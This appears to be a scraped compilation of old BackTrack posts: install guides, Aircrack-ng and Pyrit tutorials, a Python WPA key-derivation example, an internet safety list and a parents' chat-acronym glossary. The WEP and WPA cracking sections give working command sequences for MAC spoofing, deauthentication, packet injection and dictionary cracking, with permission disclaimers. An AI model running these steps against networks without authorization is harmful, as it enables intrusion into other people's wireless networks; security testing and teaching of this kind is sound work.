
Aircrack-ng – WEP and WPA-PSK keys cracking program

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like the KoreK attacks, as well as the all-new PTW attack, which makes it much faster than other WEP cracking tools. Aircrack-ng is a set of tools for auditing wireless networks, not for WiFi hacking. Make sure you use it only on your own network or one where you have permission to test.

Aircrack-ng is the next generation of aircrack with lots of new features:


Shutdown Command for BackTrack 3 or 4

Since BackTrack is built on Linux, you can shut down BackTrack from the shell with poweroff or restart it with reboot.



BackTrack 4 PreRelease Hard Disk Install

Since BackTrack 4 Pre-Release does not contain an installer you can follow these steps to install BT4 quickly and easily. The assumption is that you are installing BT4 on an empty disk (/dev/sda in this tutorial).

Boot from the BT4 DVD (download the BackTrack 4 ISO; make sure to get the BT4 Beta and not the BT4 Pre Release). Enter the commands shown after the root@bt prompt.

1. Start by creating 3 partitions on the disk, one each for boot, swap and root. Note that since your disk size is probably different from mine, the number of cylinders will likely differ too.

root@bt:~# fdisk /dev/sda

The number of cylinders for this disk is set to 19457.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-19457, default 1): <enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-19457, default 19457): +128M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (18-19457, default 18): <enter>
Using default value 18
Last cylinder, +cylinders or +size{K,M,G} (18-19457, default 19457): +1024M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 3
First cylinder (150-19457, default 150): <enter>
Using default value 150
Last cylinder, +cylinders or +size{K,M,G} (150-19457, default 19457): +16000M

Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 82
Changed system type of partition 2 to 82 (Linux swap / Solaris)

Command (m for help): a
Partition number (1-4): 1

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.
root@bt:~#

2. Format the file systems, mount them and copy over the directory structure. Chroot into new environment.

root@bt:~# mke2fs /dev/sda1
root@bt:~# mkswap /dev/sda2
root@bt:~# swapon /dev/sda2
root@bt:~# mkreiserfs /dev/sda3
root@bt:~# mkdir /mnt/bt
root@bt:~# mount /dev/sda3 /mnt/bt/
root@bt:~# mkdir /mnt/bt/boot
root@bt:~# mount /dev/sda1 /mnt/bt/boot
root@bt:~# cp --preserve -R /{bin,dev,home,pentest,root,usr,boot,etc,lib,opt,sbin,var} /mnt/bt/
root@bt:~# mkdir /mnt/bt/{mnt,tmp,proc,sys}
root@bt:~# chmod 1777 /mnt/bt/tmp/
root@bt:~# mount -t proc proc /mnt/bt/proc
root@bt:~# mount -o bind /dev /mnt/bt/dev/
root@bt:~# chroot /mnt/bt/ /bin/bash

3. Configure /etc/lilo.conf to reflect your setup.

lba32
boot=/dev/sda
root=/dev/sda3

# bitmap=/boot/sarge.bmp
# bmp-colors=1,,0,2,,0
# bmp-table=120p,173p,1,15,17
# bmp-timer=254p,432p,1,0,0
# install=bmp

# delay=20

prompt
timeout=50

# map=/boot/map

vga=0x317

image=/boot/vmlinuz
label="BT4"
read-only
initrd=/boot/splash.initrd
append=quiet

4. Fix the first line in /etc/fstab and remove unnecessary mount lines. Add the swap partition to fstab so it is enabled at boot time. Your fstab should look similar to this:

/dev/sda3 / reiserfs defaults 0 0 # AutoUpdate
/dev/sda2 none swap sw 0 0
proc /proc proc defaults 0 0 # AutoUpdate
sysfs /sys sysfs defaults 0 0 # AutoUpdate
devpts /dev/pts devpts gid=5,mode=620 0 0 # AutoUpdate
tmpfs /dev/shm tmpfs defaults 0 0 # AutoUpdate

5. Execute lilo and reboot!

root@bt:/# lilo -v
LILO version 22.8, Copyright (C) 1992-1998 Werner Almesberger
Development beyond version 21 Copyright (C) 1999-2006 John Coffman
Released 19-Feb-2007, and compiled at 14:08:06 on May 15 2008
Ubuntu

Reading boot sector from /dev/sda
Using MENU secondary loader
Calling map_insert_data

Boot image: /boot/vmlinuz
Mapping RAM disk /boot/splash.initrd
Added BT4 *

Writing boot sector.
Backup copy of boot sector in /boot/boot.0800
root@bt:/# exit
exit
root@bt:~# reboot



HowTo: Crack WPA with Backtrack 3

This is an easy-to-follow tutorial on how to crack a WPA encrypted password. This information should only be used for educational purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid) wlan0
  8. aircrack-ng (filename-01.cap) -w (dictionary location)


HowTo: Crack WEP with BackTrack 3

This is a tutorial on how to crack a WEP encrypted password. This information should only be used for educational purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)


Wireless WPA/WPA2-PSK GPU Cracking with Pyrit – How to Use Pyrit in BackTrack

Pyrit is a GPU cracker for attacking the WPA/WPA2-PSK protocols. It can build massive databases that pre-compute part of the WPA/WPA2-PSK authentication phase, trading storage space for cracking time. Pyrit supports many platforms, including CUDA, ATI-Stream, OpenCL and VIA Padlock.

How to
Listing available cores

pyrit list_cores

Determining performance of cores

pyrit benchmark

Create a new ESSID

pyrit -e Linksys create_essid

Import list of passwords

pyrit -f dict.txt import_passwords

Start Batch Processing

pyrit batch

Cracking WPA/WPA2-PSK using pyrit/coWPAtty

pyrit -e "Linksys" -f dict.txt passthrough | cowpatty -d - -r wpa2handshake.cap -s "Linksys"
"-e" ESSID for the command
"-f" Filename for the command ('-' is stdin/stdout)
"-d" Hash file
"-" Accept words on stdin
"-r" Packet capture file
"-s" Network SSID
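To make the space-time tradeoff concrete, here is an added Python example (not part of the original post or of Pyrit itself) showing what Pyrit precomputes per ESSID: the PMK, derived with PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as the salt. The wordlist and the "Home-7f3a" ESSID are constructed; the point for defenders is that a unique ESSID makes shared precomputed tables useless and a long random passphrase makes any dictionary table miss.

```python
import hashlib
import time

# Constants fixed by IEEE 802.11i for the WPA/WPA2-PSK passphrase-to-PMK mapping
PBKDF2_ITERATIONS = 4096
PMK_LENGTH = 32          # bytes; needs two 20-byte SHA-1 output blocks


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    The ESSID is the salt, which is why Pyrit keeps one table per ESSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def sha1_compressions_per_pmk() -> int:
    """Work per candidate passphrase: 2 output blocks x 4096 iterations x
    2 SHA-1 compressions per HMAC (inner + outer, padded keys precomputed)."""
    blocks = -(-PMK_LENGTH // 20)            # ceil(32 / 20) = 2
    return blocks * PBKDF2_ITERATIONS * 2    # = 16384


def precompute_table(essid: str, wordlist) -> dict:
    """The 'space' side of the tradeoff: pay the PBKDF2 cost once for each
    (ESSID, passphrase) pair and keep PMK -> passphrase for instant lookup."""
    return {derive_pmk(word, essid): word for word in wordlist}


def table_lookup(table: dict, pmk: bytes):
    """The 'time' side: a candidate PMK costs one dict lookup, no PBKDF2."""
    return table.get(pmk)


def measure_guesses_per_second(essid: str = "Linksys", samples: int = 20) -> float:
    """Rough single-core CPU throughput, to compare against 'pyrit benchmark'."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"sample-{i:04d}", essid)   # constructed sample passphrases
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # Constructed wordlist; the ESSID "Linksys" matches the commands above
    words = ["password", "letmein1", "Linksys1", "changeme"]
    table = precompute_table("Linksys", words)
    # A network that kept the factory ESSID is covered by the table ...
    print(table_lookup(table, derive_pmk("letmein1", "Linksys")))    # letmein1
    # ... but the same weak passphrase under a unique ESSID is not
    print(table_lookup(table, derive_pmk("letmein1", "Home-7f3a")))  # None
    print(sha1_compressions_per_pmk(), "SHA-1 compressions per guess")
    print(f"{measure_guesses_per_second():.0f} PMKs/s on this CPU")
```

The derive_pmk function reproduces the IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), so it is the same value a supplicant computes when you type the passphrase.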


How To Install Backtrack4 Using Grub On Ubuntu

BackTrack is an operating system specially designed for network security. BackTrack is based on Linux. As of this writing the latest version is BackTrack 4, which ships with many useful applications. Before installing BT4, make sure you have installed Ubuntu on your computer so we can use Ubuntu's GRUB for booting.

Follow these steps to install and configure dual booting Ubuntu / Backtrack4.

  1. Prepare your PC
    Ubuntu OS installed on sda2
    BT4 will install on sda3
  2. Run BT4 using LiveCD
    user : root
    password : toor
    #startx
  3. Installation process

    # mkfs.ext3 /dev/sda3

    # mkdir /mnt/BT4
    # mkdir /mnt/ubuntu
    # mount /dev/sda3 /mnt/BT4
    # mount /dev/sda2 /mnt/ubuntu
    # mkdir /mnt/BT4/boot

    # cp /boot/vmlinuz /mnt/BT4/boot
    # cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/BT4/
    # mkdir /mnt/BT4/{mnt,proc,sys,tmp}
    # mount --bind /dev/ /mnt/BT4/dev/
    # mount -t proc proc /mnt/BT4/proc/

  4. Edit Grub of Ubuntu
    # vi /mnt/ubuntu/boot/grub/menu.lst

    #you must insert this at bottom page:
    title Backtrack4
    rootnoverify (hd0,2)
    kernel /boot/vmlinuz vga=791 root=/dev/sda3 ro autoexec=xconf;kdm
    boot

  5. Exit and restart your PC. Select “Backtrack4” and login.
  6. Registering sda3 to fstab
    We must register /dev/sda2 and /dev/sda3 so either Ubuntu or BT4 can be booted.

    # mkdir /mnt/BT4
    # mkdir /mnt/ubuntu
    # vi /etc/fstab

    /dev/sda2 /mnt/ubuntu ext3 defaults 0 0
    /dev/sda3 /mnt/BT4 ext3 defaults 0 0


Cracking WEP Using Backtrack: Beginner’s Guide

This tutorial is intended for users with little or no experience with Linux or wifi. BackTrack, from remote-exploit, is a tool that makes it very easy to access any network secured by WEP encryption. This tutorial aims to guide you through the process of using it effectively.

Required Tools

  • You will need a computer with a wireless adapter listed here
  • Download BackTrack (4 Pre Release is the most recent as of this writing) and burn the ISO to a CD

OVERVIEW

BackTrack is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.

Tools Overview

  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging ARP requests
  • aircrack – a tool for decrypting WEP keys
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address

Glossary of Terms

  • AP: Access Point, a wireless router
  • MAC Address: Media Access Control address, a unique ID assigned to wireless adapters and routers. It is written in hexadecimal (e.g. 00:11:ef:22:a3:6a)
  • BSSID: the Access Point's MAC address
  • ESSID: the Access Point's broadcast name (e.g. linksys, default, belkin). Some APs will not broadcast their name, but Kismet may be able to detect it anyway
  • TERMINAL: Command line interface. You can open this by clicking the black box icon next to the start key in BackTrack.
  • WEP: short for Wired Equivalent Privacy, a security protocol for Wi-Fi networks.
  • WPA: short for WiFi Protected Access, a more secure protocol than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since BackTrack is a live CD running off your cdrom, there is nowhere you can write files to unless you have a Linux partition on your hard drive or a USB storage device. BackTrack has some NTFS support, so you will be able to browse to your Windows based hard drive should you have one, but it will mount the partition as "read-only". To find your hard drive or USB storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1, or hda2 if you have more than one partition on the drive. Alternatively, hdb1 could show up if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.

DISCLAIMER

Hacking into someone’s wireless network without permission is probably against the law. Make sure you are using this to test your own system(s) or one that you have explicit permission to “test.”

IMPLEMENTATION

STEP 1

Monitoring Wireless Traffic With Kismet

Place the BackTrack CD into your cd-rom drive and boot into BackTrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into Linux, login as root with username: root password: toor. These are the default username and password used by BackTrack. A command prompt will appear. Type startx to start KDE (a ‘Windows’ like workspace for Linux).

Once KDE is up and running start kismet by clicking on the start key and browsing to BackTrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:

kismet

Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely 'ath0', and sit back as kismet starts detecting networks in range.

NOTE: We are using kismet for two reasons:

  1. To find the bssid, essid, and channel number of the AP you are accessing.
  2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device’s name just type:

iwconfig

Which will look something like this:

While kismet detects networks and the various clients accessing those networks, you might want to type 's' and then 'Q' (case sensitive). This sorts all of the APs in your area by signal strength. The default 'autofit' mode that kismet starts in doesn't allow you much flexibility. By sorting APs by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (Side note: when selecting the target AP, keep in mind this tutorial only covers accessing APs that use WEP encryption. In kismet the flags for encryption are Y/N/0: Y = WEP, N = open network with no encryption, 0 = other, most likely WPA.) Further reading on Kismet is available here.

Select the AP (access point) you want to access. Copy and paste the broadcast name (essid), MAC address (bssid), and channel number of your target AP into a text editor. BackTrack is KDE based, so you can use kwrite: just open a terminal and type 'kwrite', or select it from the start button. In BackTrack's terminal, copy and paste are shift+ctrl+c and shift+ctrl+v respectively. Leave kismet running to keep your wireless adapter in monitor mode. You can also use airmon to do this manually; run airmon-ng -h for help.

STEP 2

Collecting Data With Airodump

Open a new terminal and start airodump to collect ARP replies from the target AP. Airodump is fairly straightforward, but you can type "airodump-ng -h" at the command prompt for additional options.

airodump-ng ath0 -w /mnt/hda2/home/admin/ap_dump 6 1

Breaking down this command:

  • ath0 is my wireless card
  • -w tells airodump to write the capture to /mnt/hda2/home/admin/ap_dump
  • 6 is the channel of my target AP
  • 1 tells airodump to only collect IVs, the initialization vectors from data packets that aircrack uses to recover the WEP key

STEP 3

Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:11:22:AA:BB:CC ath0

  • -1 at the beginning specifies the type of attack, in this case fake authentication with the AP. You can view all options by typing aireplay-ng -h
  • 0 specifies the delay between attacks
  • -e is the essid tag. belkin is the essid or broadcast name of my target AP; linksys or default are other common names
  • -a is the bssid tag (MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
  • -h is your wireless adapter's MAC address. You can use macchanger to view and change your MAC address: macchanger -s ath0
  • ath0 at the end is my wireless adapter's device name in Linux

STEP 4

Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:AA:BB:CC ath0

NOTES:

  • -b requires the MAC address of the AP we are accessing.
  • -h is your wireless adapter's MAC address. You can use macchanger to view and change your MAC address: macchanger -s ath0
  • If packets are being collected at a slow pace, you can type iwconfig ath0 rate auto to adjust your wireless adapter's transmission rate. You can find your AP's transmission rate in kismet by using the up and down arrow keys to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.

As aireplay runs, the ARP packet count will slowly increase. This may take a while if there aren't many ARP requests from other computers on the network. As it runs, however, the ARP count should start to increase more quickly. If the ARP count stops increasing, just open a new terminal and re-associate with the AP via step 3. There is no need to close the open aireplay terminal window before doing this; just do it simultaneously. You will probably need somewhere between 200k and 500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

just reassociate with the AP following the instructions in step 3.

STEP 5

Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/admin/ap_dump.ivs

Change /mnt/hda2/home/admin/ap_dump.ivs to your file's location. Once you have enough captured data packets, decrypting the key will only take a couple of seconds. If aircrack doesn't find a key almost immediately, just sit back and wait for more data packets.

For more information or assistance you can access the BackTrack forums at remote-exploit.org.


Internet Safety: How to keep your computer safe on the Internet

Here are some things you can, and should, do to stay safe.

  • Stay Up-To-Date – Most virus infections don’t have to happen. Software vulnerabilities that the viruses exploit usually already have patches available by the time the virus reaches a computer. The problem? The user simply failed to install the latest patches and updates that would have prevented the infection in the first place. The solution is simple: enable automatic updates, and visit Windows Update periodically. Keeping Windows and other software up-to-date is the most important (and easiest) thing you can do to protect your computer.
  • Get Educated – To be blunt, all the protection in the world won’t save you from yourself. Don’t open attachments that you aren’t positive are okay. Don’t fall for phishing scams. Don’t click on links in email that you aren’t positive are safe. Don’t install “free” software without checking it out first – many “free” packages are free because they come loaded with spyware, adware and worse. When visiting a web site, did you get a pop-up asking if it’s ok to install some software you’re not sure of because you’ve never heard of it? Don’t say “OK”. Not sure about some security warning you’ve been given? Don’t ignore it. Choose strong passwords, and don’t share them with others.
  • Use a Firewall – A firewall is a piece of software or hardware that sits between your computer and the Internet and only allows certain types of traffic to cross. For example, a firewall may allow checking email and browsing the web, but disallow things that are commonly not as useful, such as RPC or "Remote Procedure Calls".
  • Virus Scan – Sometimes, typically via email, viruses are able to cross the firewall and get to your computer anyway. A virus scanner will locate and remove them from your hard disk. A real time virus scanner will notice them as they arrive, even before they hit the disk, but at the cost of slowing down your machine a little. Important: because new viruses are arriving every day, it's important to keep your virus definitions up-to-date. Be sure to enable the scanning software's automatic-update feature and have it do so every day.
  • Kill Spyware – Spyware is similar to viruses in that it arrives unexpected and unannounced and proceeds to do something undesired. Normally spyware is relatively benign from a safety perspective, but it can violate your privacy by tracking the web sites you visit, or add "features" to your system that you didn't ask for. The worst offenders are spyware that hijack normal functions for themselves. For example, some like to redirect your web searches to other sites to try and sell you something. Of course some spyware is so poorly written that it might as well be a virus, given how unstable it can make your system. The good news is that, like virus scanners, there are spyware scanners that will locate and remove the offending software.
  • Secure Your Mobile Connection – if you’re traveling and using internet hot spots, free Wifi or internet cafes, you must take extra precautions. Make sure that your web email access is via secure (https) connections, or that your regular mail is over an encrypted connection as well. Don’t let people “shoulder surf” and steal your password by watching you type it in a public place. Make sure your home Wifi has WEP or, preferably WPA security enabled if anyone can drive or walk within range.
  • Don’t forget the physical – an old computer adage is that “if it’s not physically secure, it’s not secure.” All of the precautions I’ve listed above are pointless if other people can get at your computer. They may not follow the safety rules I’ve laid out. A thief can easily get at all the unencrypted data on your computer if they can physically get to it. The common scenario is a laptop being stolen, but there are many reports of people who’ve been burned because a family member or roommate accessed their computer without their knowledge. 

It all might seem overwhelming, but it’s not nearly as overwhelming as an actual security problem if and when it happens to you. While we might want it to be otherwise, the practical reality of the internet, and computing today, is that we each must take responsibility for our own security online.


Top 50 Internet Acronyms Parents Need to Know

Parents, do you know what your kids (teen and pre-teen) are saying when they chat? Here are 50 text/SMS/Internet acronyms/shortcuts parents need to know.

Go to our complete list of Internet/Chat acronyms (nearly 2000).

8 Oral sex
1337 Elite -or- leet -or- L337
143 I love you
182 I hate you
1174 Nude club
420 Marijuana
459 I love you
ADR Address
AEAP As Early As Possible
ALAP As Late As Possible
ASL Age/Sex/Location
CD9 Code 9 – it means parents are around
C-P Sleepy
F2F Face-to-Face
GNOC Get Naked On Cam
GYPO Get Your Pants Off
HAK Hugs And Kisses
ILU I Love You
IWSN I Want Sex Now
J/O Jerking Off
KOTL Kiss On The Lips
KFY -or- K4Y Kiss For You
KPC Keeping Parents Clueless
LMIRL Let’s Meet In Real Life
MOOS Member Of The Opposite Sex
MOSS Member(s) Of The Same Sex
MorF Male or Female
MOS Mom Over Shoulder
MPFB My Personal F*** Buddy
NALOPKT Not A Lot Of People Know That
NIFOC Nude In Front Of The Computer
NMU Not Much, You?
P911 Parent Alert
PAL Parents Are Listening
PAW Parents Are Watching
PIR Parent In Room
POS Parent Over Shoulder -or- Piece Of Sh**
pron porn
Q2C Quick To Cum
RU/18 Are You Over 18?
RUMORF Are You Male OR Female?
RUH Are You Horny?
S2R Send To Receive
SorG Straight or Gay
TDTM Talk Dirty To Me
WTF What The F***
WUF Where You From
WYCM Will You Call Me?
WYRN What’s Your Real Name?
zerg To gang up on someone